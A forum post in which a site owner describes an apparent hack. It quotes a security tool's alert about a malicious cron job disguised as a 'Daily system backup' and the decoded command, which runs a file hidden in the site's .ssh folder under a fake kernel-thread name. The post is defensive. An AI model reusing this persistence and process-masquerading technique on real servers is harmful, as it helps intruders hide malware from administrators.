Hi there,
I had just had a what I believe was targeted hack attempt.
Initially, I received an email from cPfence (what would we do without it?):
`Dear Admin,
An infected cron entry was detected and removed on node1. This is a one-time alert for this user.
Details:
- Username: *********
- Site UUID: ***************
- Infected Cron Command: 0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAg.................. Daily system backup
Recommendation:
We strongly recommend that you manually inspect the site's files, plugins, and themes for any hidden or malicious content. Pay close attention to recently modified files and look for any unfamiliar additions.
- Inspect the site directory: /var/www/***********
- Review recent changes:
find /var/www/************** -type f -mtime -2 -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort
- If WordPress, check wp-content/plugins and wp-content/themes for unknown or recently changed items
- Update core, plugins, and themes, and rotate passwords for wp-admin, database, and SFTP
- Review remaining cron jobs for ********:
su - ********** -c 'crontab -l'
Best regards,
The cPFence Team`
The encoded cron entry did this:
/usr/bin/bash -c "exec -a '[raid5wq]' '/var/www/*************/.ssh/putty/id_rsa'" \
I also noticed extra files on /.ssh directory
This is website running a very old PHP app called OxyClassifieds. It seems that there are numerous vulnerabilities in there.
